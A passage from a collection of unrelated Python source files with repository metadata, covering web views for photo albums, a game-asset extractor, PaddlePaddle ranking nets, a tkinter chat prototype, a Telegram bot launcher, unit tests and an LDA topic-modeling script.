permission=Private, request_method='GET')
def select_images(self, request, layout=None):
collection = ImageFileCollection(request.session)
selected = {f.id for f in self.files}
def produce_image(id):
return {
'id': id,
'src': request.class_link(File, {'id': id}, 'thumbnail'),
'selected': id in selected
}
images = [
{
'group': request.translate(group),
'images': tuple(produce_image(id) for group, id in items)
} for group, items in collection.grouped_by_date()
]
layout = layout or ImageSetLayout(self, request)
layout.breadcrumbs.append(Link(_("Select"), '#'))
action = URL(request.link(self, 'select')).query_param(
'csrf-token', request.new_csrf_token())
return {
'layout': layout,
'title': _("Select images"),
'images': images,
'action': action
}
@OrgApp.html(model=ImageSet, name='select', template='select_images.pt',
permission=Private, request_method='POST')
def handle_select_images(self, request):
# we do custom form handling here, so we need to check for CSRF manually
request.assert_valid_csrf_token()
if not request.POST:
self.files = []
else:
self.files = request.session.query(ImageFile)\
.filter(ImageFile.id.in_(request.POST)).all()
request.success(_("Your changes were saved"))
return morepath.redirect(request.link(self))
@OrgApp.form(model=ImageSetCollection, name='new', template='form.pt',
permission=Private, form=get_form_class)
def handle_new_imageset(self, request, form, layout=None):
if form.submitted(request):
imageset = self.add(title=form.title.data)
form.populate_obj(imageset)
request.success(_("Added a new photo album"))
return morepath.redirect(request.link(imageset))
layout = layout or ImageSetCollectionLayout(self, request)
layout.include_editor()
layout.breadcrumbs.append(Link(_("New"), '#'))
return {
'layout': layout,
'title': _("New Photo Album"),
'form': form,
}
@OrgApp.form(model=ImageSet, name='edit', template='form.pt',
permission=Private, form=get_form_class)
def handle_edit_imageset(self, request, form, layout=None):
if form.submitted(request):
form.populate_obj(self)
request.success(_("Your changes were saved"))
return morepath.redirect(request.link(self))
elif not request.POST:
form.process(obj=self)
layout = layout or ImageSetLayout(self, request)
layout.include_editor()
layout.breadcrumbs.append(Link(_("Edit"), '#'))
return {
'layout': layout,
'title': self.title,
'form': form
}
@OrgApp.view(model=ImageSet, request_method='DELETE', permission=Private)
def handle_delete_imageset(self, request):
request.assert_valid_csrf_token()
collection = ImageSetCollection(request.session)
collection.delete(self)
@OrgApp.html(model=ImageSet, template='imageset.pt', permission=Public)
def view_imageset(self, request, layout=None):
return {
'layout': layout or ImageSetLayout(self, request),
'title': self.title,
'imageset': self
}
avg_line_length: 28.910828 | max_line_length: 77 | alphanum_fraction: 0.667548
hexsha: 9cd7843ba6ddf96feac2b4041d2fbfea8c209aad | size: 417 | ext: py | lang: Python
path: doc/examples/using_jit_diff_types.py | repo: fluiddyn/transonic | head: a460e9f6d1139f79b668cb3306d1e8a7e190b72d | licenses: ["BSD-3-Clause"]
stars: 88 (2019-01-08T16:39:08.000Z to 2022-02-06T14:19:23.000Z) | issues: 13 (2019-06-20T15:53:10.000Z to 2021-02-09T11:03:29.000Z) | forks: 1 (2019-11-05T03:03:14.000Z to 2019-11-05T03:03:14.000Z)
from transonic import jit, Type
T = Type(int, float)
@jit()
def func(a: T, b: T):
return a * b
if __name__ == "__main__":
from time import sleep
a_i = b_i = 1
a_f = b_f = 1.0
for _ in range(10):
print(_, end=",", flush=True)
func(a_i, b_i)
sleep(1)
print()
for _ in range(10):
print(_, end=",", flush=True)
func(a_f, b_f)
sleep(1)
avg_line_length: 14.37931 | max_line_length: 37 | alphanum_fraction: 0.508393
hexsha: 9ce7112e3604b827cf80c10d2509ef0d153fd9a1 | size: 3,778 | ext: py | lang: Python
path: extract_q.py | repo: hoehermann/YDKJ4JS | head: 077013baf4299767954370482361cba952d0c16a | licenses: ["MIT"]
stars: 2 (2021-10-02T00:16:17.000Z to 2022-02-17T17:27:47.000Z) | issues: null | forks: null
import sys
import re
import subprocess
import json
import os
import argparse
sid_re = re.compile('exports ([0-9]+) as "([^"]+)"')
smap_re = re.compile('Push String:"(S[^"]+)".*String:"(A[^"]+)"')
actionstring_re = re.compile('Push String:"_(?P<key>.+)" String:"(?P<value>.+)"')
def extract_assets(dat_filename, outpath):
question = {'audio': {}}
swfdump_args = ['swfdump', '-a', dat_filename]
swfdump_process = subprocess.run(swfdump_args, stdout=subprocess.PIPE, encoding='utf-8', check=True)
swfdump = swfdump_process.stdout
for swfdump_line in swfdump.split('\n'):
# extract audio information
sid = sid_re.search(swfdump_line)
if (sid):
sound_id = sid.group(1)
sound_name = sid.group(2)
question['audio'][sound_name] = (sound_id,)
else:
smap = smap_re.search(swfdump_line)
if (smap):
sound_name = smap.group(1)
sound_application = smap.group(2)
(sound_id,) = question['audio'][sound_name]
question['audio'][sound_name] = (sound_application, sound_id)
else:
# extract question texts
actionstring_match = actionstring_re.search(swfdump_line)
if (actionstring_match):
key = actionstring_match.group('key')
value = actionstring_match.group('value')
question[key] = value
for sound_name, appid in question['audio'].items():
if (len(appid) > 1):
sound_application, sound_id = appid
else:
(sound_id,) = appid
sound_application = sound_name
sound_filename = f'{outpath}/{sound_application}.mp3'
# extract audio file
if (not os.path.isfile(sound_filename)):
os.makedirs(outpath, exist_ok=True)
swfextract_args = ['swfextract', '-o', sound_filename, '-s', sound_id, dat_filename]
subprocess.run(swfextract_args, check=True)
question['audio'] = {appid[0]: name for name, appid in question['audio'].items()}
return question
# main part of the script (note: it is not guarded by if __name__ == '__main__')
parser = argparse.ArgumentParser(description='Extract YDKJ 4 (German Edition) assets.')
parser.add_argument('--input', type=str, required=True, help="Path to installation root. Must contain lib/q/qlist.dat.")
parser.add_argument('--output', type=str, required=True, help="Directory for output.")
parser.add_argument('--max_items', type=int, default=0)
args = parser.parse_args()
input_path_q = args.input+'/lib/q'
if (os.path.isdir(input_path_q)):
qlist_path = input_path_q+'/qlist.dat'
with open(qlist_path, 'r') as qlistfile:
questions = []
qid_re = re.compile('(?<=id=")[^"]{3}')
tid_re = re.compile('(?<=t=").')
for qlistline in qlistfile:
tid_match = tid_re.search(qlistline)
qid_match = qid_re.search(qlistline)
if (tid_match and qid_match):
tid = tid_match.group(0)
if (tid != 's'):
# only shorties for now
continue
qid = qid_match.group(0)
dat_filename = f'{input_path_q}/{qid}.dat'
asset_path = f'{args.output}/{qid}'
question = extract_assets(dat_filename, asset_path)
question['t'] = tid
questions.append(question)
sys.stderr.write('.')
sys.stderr.flush()
if (args.max_items and len(questions) >= args.max_items):
sys.stderr.write('\nMaximum count of items reached. Stopping prematurely.')
break
sys.stderr.write('\n')
print(json.dumps(questions, ensure_ascii=False, indent=2))
else:
print(extract_assets(args.input, args.output))
avg_line_length: 42.449438 | max_line_length: 120 | alphanum_fraction: 0.597935
hexsha: 1470b74d57070c459c579edd8ffa56d8aac38b93 | size: 5,655 | ext: py | lang: Python
path: deprecated/benchmark/ps/semantic_matching/nets.py | repo: hutuxian/FleetX | head: 843c7aa33f5a14680becf058a3aaf0327eefafd4 | licenses: ["Apache-2.0"]
stars: 170 (2020-08-12T12:07:01.000Z to 2022-03-07T02:38:26.000Z) | issues: 195 (2020-08-13T03:22:15.000Z to 2022-03-30T07:40:25.000Z) | forks: 67 (2020-08-14T02:07:46.000Z to 2022-03-28T10:05:33.000Z)
# Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import paddle.fluid as fluid
const_var=fluid.layers.fill_constant_batch_size_like
param_config=fluid.ParamAttr
pooling=fluid.layers.sequence_pool
elem_sub=fluid.layers.elementwise_sub
elem_add=fluid.layers.elementwise_add
def get_global_pn(pos_score, neg_score):
wrong = fluid.layers.cast(
fluid.layers.less_than(pos_score, neg_score), dtype='float32')
wrong_cnt = fluid.layers.reduce_sum(wrong)
right = fluid.layers.cast(
fluid.layers.less_than(neg_score, pos_score), dtype='float32')
right_cnt = fluid.layers.reduce_sum(right)
global_right_cnt = fluid.default_startup_program().global_block().create_var(
name="right_cnt", dtype=fluid.core.VarDesc.VarType.FP32, shape=[1], persistable=True,
initializer=fluid.initializer.Constant(value=float(0), force_cpu=True))
global_wrong_cnt = fluid.default_startup_program().global_block().create_var(
name="wrong_cnt", dtype=fluid.core.VarDesc.VarType.FP32, shape=[1], persistable=True,
initializer=fluid.initializer.Constant(value=float(0), force_cpu=True))
fluid.default_main_program().global_block().create_var(
name="right_cnt", dtype=fluid.core.VarDesc.VarType.FP32, shape=[1], persistable=True)
fluid.default_main_program().global_block().create_var(
name="wrong_cnt", dtype=fluid.core.VarDesc.VarType.FP32, shape=[1], persistable=True)
#fluid.layers.Print(global_right_cnt)
#fluid.layers.Print(global_wrong_cnt)
global_right_cnt.stop_gradient = True
global_wrong_cnt.stop_gradient = True
fluid.default_main_program().global_block().append_op(
type='elementwise_add', inputs={'X':[global_right_cnt], 'Y':[right_cnt]},
outputs={'Out':[global_right_cnt]})
fluid.default_main_program().global_block().append_op(
type='elementwise_add', inputs={'X':[global_wrong_cnt], 'Y':[wrong_cnt]},
outputs={'Out':[global_wrong_cnt]})
pn = fluid.layers.elementwise_div(global_right_cnt, global_wrong_cnt)
return global_right_cnt, global_wrong_cnt, pn
def get_pn(pos_score, neg_score):
"""acc"""
wrong = fluid.layers.cast(
fluid.layers.less_than(pos_score, neg_score), dtype='float32')
wrong_cnt = fluid.layers.reduce_sum(wrong)
right = fluid.layers.cast(
fluid.layers.less_than(neg_score, pos_score), dtype='float32')
right_cnt = fluid.layers.reduce_sum(right)
pn = fluid.layers.elementwise_div(right_cnt, wrong_cnt)
return right_cnt, wrong_cnt, pn
def bow_encoder(query, pos_title, neg_title,
dict_dim, emb_dim, hid_dim,
emb_lr, fc_lr, margin):
q_emb = fluid.layers.embedding(
input=query,
size=[dict_dim, emb_dim],
param_attr=param_config(
name="__emb__",
learning_rate=emb_lr),
is_sparse=True)
pt_emb = fluid.layers.embedding(
input=pos_title,
size=[dict_dim, emb_dim],
param_attr=param_config(
name="__emb__",
learning_rate=emb_lr),
is_sparse=True)
nt_emb = fluid.layers.embedding(
input=neg_title,
size=[dict_dim, emb_dim],
param_attr=param_config(
name="__emb__",
learning_rate=emb_lr),
is_sparse=True)
q_sum = pooling(input=q_emb, pool_type='sum')
pt_sum = pooling(input=pt_emb, pool_type='sum')
nt_sum = pooling(input=nt_emb, pool_type='sum')
q_ss = fluid.layers.softsign(q_sum)
pt_ss = fluid.layers.softsign(pt_sum)
nt_ss = fluid.layers.softsign(nt_sum)
q_fc = fluid.layers.fc(
input=q_ss,
size=hid_dim,
param_attr=param_config(
name="__q_fc__",
learning_rate=fc_lr),
bias_attr=param_config(
name="__q_fc_b__"))
pt_fc = fluid.layers.fc(
input=pt_ss,
size=hid_dim,
param_attr=param_config(
name="__fc__",
learning_rate=fc_lr),
bias_attr=param_config(
name="__fc_b__"))
nt_fc = fluid.layers.fc(
input=nt_ss,
size=hid_dim,
param_attr=param_config(
name="__fc__",
learning_rate=fc_lr),
bias_attr=param_config(
name="__fc_b__"))
cos_q_pt = fluid.layers.cos_sim(q_fc, pt_fc)
cos_q_nt = fluid.layers.cos_sim(q_fc, nt_fc)
margin_var = const_var(input=cos_q_pt,
shape=[-1, 1],
value=margin,
dtype='float32')
margin_minus_qt = elem_sub(margin_var, cos_q_pt)
margin_minus_nt = elem_add(margin_minus_qt, cos_q_nt)
zero_var = const_var(input=margin_minus_nt,
shape=[-1, 1],
value=0.0,
dtype='float32')
loss = fluid.layers.elementwise_max(
zero_var, margin_minus_nt)
avg_cost = fluid.layers.mean(loss)
pnum, nnum, pn = get_global_pn(cos_q_pt, cos_q_nt)
return avg_cost, cos_q_pt, cos_q_nt, pnum, nnum, pn
avg_line_length: 36.019108 | max_line_length: 93 | alphanum_fraction: 0.663484
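For clarity, bow_encoder above optimizes a pairwise hinge (margin ranking) loss over cosine similarities; in the code's own variable names:

    loss = mean(max(0, margin - cos_q_pt + cos_q_nt))

A (query, positive title, negative title) triple stops contributing once the positive title outscores the negative one by at least margin; get_global_pn then accumulates how often the positive side wins versus loses.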
hexsha: 0d24e4d636a87ef845937fbdeee17cf92953a7ef | size: 6,403 | ext: py | lang: Python
path: 20-fs-ias-lec/groups/03-subChat/Prototyp/UI.py | repo: Kyrus1999/BACnet | head: 5be8e1377252166041bcd0b066cce5b92b077d06 | licenses: ["MIT"]
stars: 8 (2020-03-17T21:12:18.000Z to 2021-12-12T15:55:54.000Z) | issues: 2 (2021-07-19T06:18:43.000Z to 2022-02-10T12:17:58.000Z) | forks: 25 (2020-03-20T09:32:45.000Z to 2021-07-18T18:12:59.000Z)
from tkinter import *
import datetime
import threading
import feed
import pcap
import string
import crypto
import event
import os
global username
class Chat(Frame):
def save(self, contend):
feed._appendIt(self.username, 'append', contend)
def add(self, username, contend, event=None):
self.time = datetime.datetime.now()
if username != self.username: # user updated
try:
print("getting message from " + self.getPartner() + ":")
self.listBox.insert('end', '[' + self.time.strftime("%H:%M:%S") + '] ' + username + ': ' + contend)
except:
print("no new messages available from " + self.getPartner())
else: # user typed something
lastEntry = ''
try:
index = 0
ContendArray = pcap.dumpIt(username + '.pcap')
while True: # while not at the end of the list (we want to get the last entry)
try:
lastEntry = ContendArray[index+1]
lastEntry = lastEntry[2: len(ContendArray[index+1]) - 2] #removing the [""]
index += 1
except:
print("Arrived at last message: \"" + lastEntry + "\"")
if contend != '':
self.listBox.insert('end', '[' + self.time.strftime("%H:%M:%S") + '] ' + username + ': ' + contend)
self.text_field.delete(0, 'end')
self.save(contend)
break
except:
print("Something went wrong...")
def updateContend(self, fromUser):
#ContendArray = pcap.dumpIt(fromUser + '.pcap')
#print(ContendArray[self.alreadyUpdatedIndex+1])
while True:
try:
print(pcap.dumpIt(fromUser + '.pcap')[self.alreadyUpdatedIndex+1])
self.add(fromUser, pcap.dumpIt(fromUser + '.pcap')[self.alreadyUpdatedIndex+1])
self.alreadyUpdatedIndex += 1
except:
print("No new messages found from: " + self.getPartner())
break
def getPartner(self):
if self.username == 'alice':
return 'bob'
else:
return 'alice'
def createWidgets(self):
print("connected as: \"" + self.username + "\"")
self.canvas = Canvas(self.master, width=800, height=1100) # , bg='#4f4f4f')
self.rowconfigure(0, weight=1)
self.columnconfigure(0, weight=1)
self.canvas.grid(column=0, row=0, columnspan=2, sticky=N + S + E + W)
self.username_label = Label(self.canvas, text="connected as: " + self.username)
self.username_label.grid(column=0, row=0, sticky=N + S + E + W)
self.scrollbar = Scrollbar(self.canvas, orient="vertical", command=self.canvas.yview)
self.listBox = Listbox(self.canvas, height=30, width=50, yscrollcommand=self.scrollbar.set)
self.scrollbar.grid(column=2, row=0, sticky='ns')
self.listBox.grid(column=0, row=1, sticky=N + S + E + W)
self.text_field = Entry(self.canvas, textvariable=self.msg)
self.text_field.bind('<Return>', lambda event: self.add(self.username, self.msg.get()))
self.text_field.grid(column=0, row=2, sticky=N + S + E + W)
self.send_button = Button(self.canvas, text='Send', command=lambda: self.add(self.username, self.msg.get()))
self.send_button.grid(column=0, row=3, sticky=N + S + E + W)
self.update_button = Button(self.canvas, text='Update', command=lambda: self.updateContend(self.getPartner()),
bg='white')
self.update_button.grid(column=0, row=4, sticky=N + S + E + W)
def __init__(self, master=None):
global username
Frame.__init__(self, master)
master.title("Subjective Chat")
self.msg = StringVar()
self.username = username
self.partner = StringVar()
self.alreadyUpdatedIndex = 0
self.time = datetime.datetime.now()
self.createWidgets()
class Login(Frame):
def open_Chat(self):
root2 = Toplevel()
app2 = Chat(root2)
def chooseUsername(self, name):
global username
username = name
self.open_Chat()
def choseUsername(self): # ToDo: if one wants to choose a custom username
if not feed.checkKey(self.msg.get()+'.key'):
feed._appendIt(self.msg.get(), 'create', '')
if not pcap.checkPcap(self.msg.get()):
pass
self.text_field.delete(0, 'end')
self.chooseUsername(self.msg.get())
def adjust(self, name):
if name[0] == 'b' or name[0] =='B':
self.chooseUsername('bob')
else:
self.chooseUsername('alice')
def createWidgets(self):
self.canvas = Canvas(self.master, width=400, height=300) # , bg='#4f4f4f')
self.rowconfigure(0, weight=1)
self.columnconfigure(0, weight=1)
self.canvas.grid(column=0, row=0, columnspan=2, sticky=N + S + E + W)
self.username_label = Label(self.canvas, text='Choose a username:')
self.username_label.grid(column=0, row=0, sticky=N + S + E + W)
self.bob_button = Button(self.canvas, text='Bob', command=lambda: self.chooseUsername('bob'))
self.bob_button.grid(column=0, row=1, sticky=N + S + E + W)
self.bob_button = Button(self.canvas, text='Alice', command=lambda: self.chooseUsername('alice'))
self.bob_button.grid(column=0, row=2, sticky=N + S + E + W)
self.username_label = Label(self.canvas, text='\nChoose a username manually:')
self.username_label.grid(column=0, row=3, sticky=N + S + E + W)
self.text_field = Entry(self.canvas, textvariable=self.msg)
self.text_field.bind('<Return>', lambda event: self.adjust(self.msg.get()))
self.text_field.grid(column=0, row=4, sticky=N + S + E + W)
self.send_button = Button(self.canvas, text='choose', command=lambda: self.adjust(self.msg.get()))
def __init__(self, master=None):
Frame.__init__(self, master)
master.title("Login")
self.msg = StringVar()
self.createWidgets()
root = Tk()
app = Login(master=root)
try:
root.mainloop()
root.destroy()
root.close()
except:
pass
avg_line_length: 39.524691 | max_line_length: 127 | alphanum_fraction: 0.577386
hexsha: b4ed1f9c08b3d97636868474b48c6b33ed05f66c | size: 560 | ext: py | lang: Python
path: main.py | repo: Nukesor/ilswach-bot | head: 2e3e9dfa8f43b07caab79f2e94686557dc808731 | licenses: ["MIT"]
stars: null | issues: null | forks: null
#!/usr/bin/env python
"""Start the bot."""
from ilswbot.ilswbot import updater
from ilswbot.config import config
if config['webhook']['enabled']:
updater.start_webhook(
listen='127.0.0.1',
port=config['webhook']['port'],
url_path=config['webhook']['token'],
)
domain = config['webhook']['domain']
token = config['webhook']['token']
updater.bot.set_webhook(url=f'{domain}{token}',
certificate=open(config['webhook']['cert_path'], 'rb'))
else:
updater.start_polling()
updater.idle()
avg_line_length: 26.666667 | max_line_length: 83 | alphanum_fraction: 0.610714
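The script above expects a config mapping with at least the keys it reads (a sketch inferred from the lookups in the code; all values are placeholders):

config = {
    'webhook': {
        'enabled': True,                   # False falls back to start_polling()
        'port': 8443,                      # local port for start_webhook()
        'token': '<bot-token>',            # also used as the secret URL path
        'domain': 'https://example.org/',
        'cert_path': '/etc/ssl/bot.pem',
    },
}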
hexsha: 2ee3ec79f4dde5dcaa341328384d0337c62fc38c | size: 1,234 | ext: py | lang: Python
path: Python/zzz_training_challenge/Python_Challenge/solutions/tests/ch03_recursion/ex08_power_test.py | repo: Kreijeck/learning | head: eaffee08e61f2a34e01eb8f9f04519aac633f48c | licenses: ["MIT"]
stars: null | issues: null | forks: null
# Example program for the book "Python Challenge"
#
# Copyright 2020 by Michael Inden
import pytest
from ch03_recursion.solutions.ex08_power_of import is_power_of_2, power_of_iterative, power_of, power_of_optimized
@pytest.mark.parametrize("value, expected",
[(2, True), (3, False), (4, True),
(10, False), (16, True)])
def test_is_power_of2(value, expected):
assert is_power_of_2(value) == expected
def inputs_and_expected():
return [(2, 2, 4), (4, 2, 16), (16, 2, 256),
(4, 4, 256), (2, 8, 256), (3, 3, 27)]
@pytest.mark.parametrize("number, exponent, expected",
inputs_and_expected())
def test_power_of(number, exponent, expected):
assert power_of(number, exponent) == expected
@pytest.mark.parametrize("number, exponent, expected",
inputs_and_expected())
def test_power_of_optimized(number, exponent, expected):
assert power_of_optimized(number, exponent) == expected
@pytest.mark.parametrize("number, exponent, expected",
inputs_and_expected())
def test_power_of_iterative(number, exponent, expected):
assert power_of_iterative(number, exponent) == expected
avg_line_length: 32.473684 | max_line_length: 114 | alphanum_fraction: 0.659643
hexsha: 25ec149731928cd321f749e90b9c1f238cd4bac0 | size: 10,121 | ext: py | lang: Python
path: task_1/data_investigation/lda_topic_modeling.py | repo: strumswell/sentiment-apple-events | head: b6f4f7799374aba757874f5426b3a2c1bf7d29b5 | licenses: ["MIT"]
stars: 1 (2022-02-28T22:02:50.000Z to 2022-02-28T22:02:50.000Z) | issues: null | forks: null
# %% Do LDA Topic Modeling
# Imports
from sklearn.decomposition import LatentDirichletAllocation as LDA
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.model_selection import GridSearchCV
import pandas as pd
# %% Import Cleaned Documents
events = ['2020_Nov_Post', '2020_Nov', '2020_Nov_Pre', '2020_Oct_Post', '2020_Oct', '2020_Oct_Pre', '2020_Sept_Post', '2020_Sept', '2020_Sept_Pre', '2020_Jun_Post', '2020_Jun', '2020_Jun_Pre', '2019_Sept_Post', '2019_Sept', '2019_Sept_Pre', '2019_Jun', '2019_Jun_Pre', '2019_Mar_Post', '2019_Mar', '2019_Mar_Pre', '2018_Oct_Post', '2018_Oct', '2018_Oct_Pre', '2018_Sept_Post', '2018_Sept', '2018_Sept_Pre', '2018_Jun_Post', '2018_Jun', '2018_Jun_Pre', '2018_Mar']
dfs = []
for event in events:
dfs.append(pd.read_csv("../../data/cleaned/"+event+"_CleanedData.csv"))
comments_per_event = dict(zip(events, [[str(comment) for comment in df['Body'].values] for df in dfs]))
# %% Remove custom filter words
for event in comments_per_event:
filter_list = ['nan', 'appl']
cleaned_comments = [' '.join([word for word in comment.split() if str(word) not in filter_list]) for comment in comments_per_event[event]]
comments_per_event[event] = cleaned_comments
# %% Prepare lda dict
lda_data = {}
# %% Find optimal Topic number via Coherence Scores
import gensim.corpora as corpora
import gensim
import matplotlib.pyplot as plt
lda_events = ["2020_Nov_Pre", "2019_Mar_Pre", "2018_Sept_Pre", "2020_Nov", "2019_Sept", "2018_Oct"]
for event in lda_events:
# Results for specific topic
result_scores = [] # coherence scores for different lda models
result_models = [] # different lda models (per topic nr)
print("Doing " + event)
comments = [[word for word in comment.split() if len(word) > 1] for comment in comments_per_event[event]]
id2word = corpora.Dictionary(comments)
corpus = [id2word.doc2bow(comment) for comment in comments]
topics = [*range(2, 11)] # 2 ... 10
# Create lda model for each number of topics
for topic in topics:
passes = 20
iterations = 100
eval_every = 1
lda_model = gensim.models.LdaModel(corpus=corpus, id2word=id2word, \
alpha='auto', eta='auto', \
iterations=iterations, num_topics=topic, \
passes=passes, eval_every=eval_every)
result_models.append(lda_model)
coherence_model_lda = gensim.models.CoherenceModel(model=lda_model, corpus=corpus, dictionary=id2word, coherence='u_mass')
coherence_lda = coherence_model_lda.get_coherence()
result_scores.append(coherence_lda)
print(" |___ " + str(topic) + ": " + str(coherence_lda))
# Keep results for event
lda_data[event] = {
"topics": topics,
"scores": result_scores,
"models": result_models,
"corpus": corpus,
"id2word": id2word}
# %% Plot Coherence Scores per Event
fig, axes = plt.subplots(3, 2, figsize=(10,10))
fig.suptitle('Coherence Scores for Prominent Events')
for i, event in enumerate(lda_data):
ax = axes.flatten()[i]
fig.add_subplot(ax)
ax.set(xlabel='Topics', ylabel='Coherence Score (u_mass)', title=event)
ax.plot(range(2, 11), lda_data[event]['scores'])
plt.tight_layout()
plt.show()
#plt.savefig('coherence_scores.pdf')
# %% Generate WordCloud per Topic
# https://www.machinelearningplus.com/nlp/topic-modeling-visualization-how-to-present-results-lda-models/#6.-What-is-the-Dominant-topic-and-its-percentage-contribution-in-each-document
from matplotlib import pyplot as plt
from wordcloud import WordCloud
import matplotlib.colors as mcolors
cols = [color for name, color in mcolors.TABLEAU_COLORS.items()]
cloud = WordCloud(background_color='white',
width=2500,
height=1800,
max_words=15,
colormap='tab10',
                  color_func=lambda *args, **kwargs: cols[i],  # late-binds to the current topic index i in the loop below
prefer_horizontal=1.0)
for event in lda_data:
# Find best lda model (min coherence score)
best_model_index = lda_data[event]['scores'].index(min(lda_data[event]['scores']))
lda_model = lda_data[event]['models'][best_model_index]
# Get 15 most frequent words of topics
topics = lda_model.show_topics(num_words=15, formatted=False)
fig, axes = plt.subplots(4, 3, figsize=(10,10), sharex=True, sharey=True)
fig.suptitle('Topic WordClouds for ' + event )
for i, ax in enumerate(axes.flatten()):
fig.add_subplot(ax)
        if (i <= best_model_index + 1):  # the best model has best_model_index + 2 topics (topic counts start at 2)
topic_words = dict(topics[i][1])
cloud.generate_from_frequencies(topic_words, max_font_size=300)
plt.gca().imshow(cloud)
plt.gca().set_title('Topic ' + str(i+1), fontdict=dict(size=16))
plt.gca().axis('off')
plt.subplots_adjust(wspace=0, hspace=0)
plt.axis('off')
plt.margins(x=0, y=0)
plt.tight_layout()
plt.show()
#plt.savefig('topic_clouds_' + event + ".pdf")
# %% Investigation of Topics via pyLDAvis (optional)
import pyLDAvis.gensim
best_model_index = lda_data['2020_Nov']['scores'].index(min(lda_data['2020_Nov']['scores']))
lda_model = lda_data['2020_Nov']['models'][best_model_index]
lda_visualization = pyLDAvis.gensim.prepare(lda_model, lda_data['2020_Nov']['corpus'], lda_data['2020_Nov']['id2word'], sort_topics=True)
pyLDAvis.display(lda_visualization)
############### Sentiment Analysis of each Topic ###############
# %% Import uncleaned Documents
dfs_uncleaned = []
for event in events:
dfs_uncleaned.append(pd.read_csv("../../data/unprocessed/"+event+"_Data.csv"))
comments_per_event_uncleaned = dict(zip(events, [[str(comment) for comment in df['Body'].values] for df in dfs_uncleaned]))
# %% Sort comments into correct topics
ordered_documents = {}
for event in lda_data:
    ordered_document = {0: [], 1: [], 2: [], 3: [], 4: [], 5: [], 6: [], 7: [], 8: [], 9: []}
    # Select this event's best model before querying its document topics.
    best_model_index = lda_data[event]['scores'].index(min(lda_data[event]['scores']))
    lda_model = lda_data[event]['models'][best_model_index]
    for i, comment_ratings in enumerate(lda_model.get_document_topics(lda_data[event]['corpus'])):
for rating in comment_ratings:
# Only save ratings of over 30% certainty that this comment belongs to this topic
if rating[1] > 0.3:
# Save index of comment
ordered_document[rating[0]].append(i)
ordered_documents[event] = ordered_document
# %% Generate sentiments
from nrclex import NRCLex
sentiment_results = {}
for event in ordered_documents:
print(event)
topics_positive_scores = []
topics_negative_scores = []
topic_labels = []
for topic in ordered_documents[event]:
if (len(ordered_documents[event][topic]) < 1): continue
topic_labels.append(topic + 1)
# Generate emotions per comments and store their result
        # NRCLex sometimes reports the truncated key 'anticip' alongside
        # 'anticipation', so both are initialised here.
        overall_scores = {'fear': 0.0, 'anger': 0.0, 'anticip': 0.0, 'anticipation': 0.0, 'trust': 0.0, 'surprise': 0.0, 'positive': 0.0, 'negative': 0.0, 'sadness': 0.0, 'disgust': 0.0, 'joy': 0.0}
        # Use the index to find the corresponding uncleaned comment
        for comment_id in ordered_documents[event][topic]:
            comment = comments_per_event_uncleaned[event][comment_id]
            comment_emotion = NRCLex(comment)
            for emotion in comment_emotion.affect_frequencies:
                overall_scores[emotion] += comment_emotion.affect_frequencies[emotion]
        # Sum positive and negative emotions
emotion_types = {
'positive': ['anticipation', 'trust', 'surprise', 'positive', 'joy'],
'negative': ['fear', 'anger', 'negative', 'sadness', 'disgust']
}
emotion_scores = {'positive': 0.0, 'negative': 0.0}
for emotion_type in emotion_types:
emotions = emotion_types[emotion_type]
for emotion in emotions:
emotion_scores[emotion_type] += overall_scores[emotion]
        total_score = emotion_scores['positive'] + emotion_scores['negative']
        # Guard against topics whose comments contain no detected emotion words.
        base = 100 / total_score if total_score else 0.0
        positive_percent = base * emotion_scores['positive']
        negative_percent = base * emotion_scores['negative']
topics_positive_scores.append(round(positive_percent))
topics_negative_scores.append(round(negative_percent))
sentiment_results[event] = [topic_labels, topics_positive_scores, topics_negative_scores]
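# %% Sanity check: NRCLex scoring on one made-up comment
# Minimal sketch of the affect_frequencies API used above; the sample
# sentence is illustrative only.
demo_emotion = NRCLex("I love the new display, but the price makes me angry.")
print(demo_emotion.affect_frequencies)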
# %% Plotting results of sentiment analysis
import matplotlib.pyplot as plt
import numpy as np
def autolabel(rects):
"""Attach a text label above each bar in *rects*, displaying its height."""
for rect in rects:
height = rect.get_height()
ax.annotate('{}'.format(height),
xy=(rect.get_x() + rect.get_width() / 2, height),
xytext=(0, 3), # 3 points vertical offset
textcoords="offset points",
ha='center', va='bottom')
fig, axes = plt.subplots(2, 3, figsize=(17.5, 10.5), sharex=False, sharey=False)
fig.set_size_inches(17.5, 10.5)
fig.suptitle('Sentiment Distribution per Topic and Event')
handles, labels = None, None  # overwritten per axis; the last values feed fig.legend below
for i, ax in enumerate(axes.flatten()):
event = list(sentiment_results.keys())[i]
x = np.arange(len(sentiment_results[event][0])) # the label locations
width = 0.35 # the width of the bars
rects1 = ax.bar(x - width/2, sentiment_results[event][1], width, label='Positive', color='g')
rects2 = ax.bar(x + width/2, sentiment_results[event][2], width, label='Negative', color='r')
# Add some text for labels, title and custom x-axis tick labels, etc.
ax.set_ylabel('Scores in %')
ax.set_xlabel('Topic')
ax.set_xticks(x)
ax.set_xticklabels(sentiment_results[event][0])
ax.set_title(event)
handles, labels = ax.get_legend_handles_labels()
autolabel(rects1)
autolabel(rects2)
fig.tight_layout()
fig.legend(handles=handles, loc='upper right')
plt.show()
#plt.savefig("topic_sentiments.pdf")
# %%
| 40.003953 | 463 | 0.668511 |
6cc07d4c91b8fd742b2edffeeecfd06f62dc0153
| 5,934 |
py
|
Python
|
src/data_science/data_science/in_out/channels.py
|
viclule/api_models_deployment_framework
|
7595cf0b4f3e277925b968014102d7561547bcd4
|
[
"MIT"
] | null | null | null |
src/data_science/data_science/in_out/channels.py
|
viclule/api_models_deployment_framework
|
7595cf0b4f3e277925b968014102d7561547bcd4
|
[
"MIT"
] | null | null | null |
src/data_science/data_science/in_out/channels.py
|
viclule/api_models_deployment_framework
|
7595cf0b4f3e277925b968014102d7561547bcd4
|
[
"MIT"
] | null | null | null |
from data_science.tools.threading_utilities import ThreadableClass
import data_science.tools.transformations as transf
from data_science.tools.classes import InstanceTraceable
from data_science.simulation.parameter import Parameter
class ChannelTypes():
"""Communication channel types."""
UNDEFINED = "undefined"
CURRENT = "current"
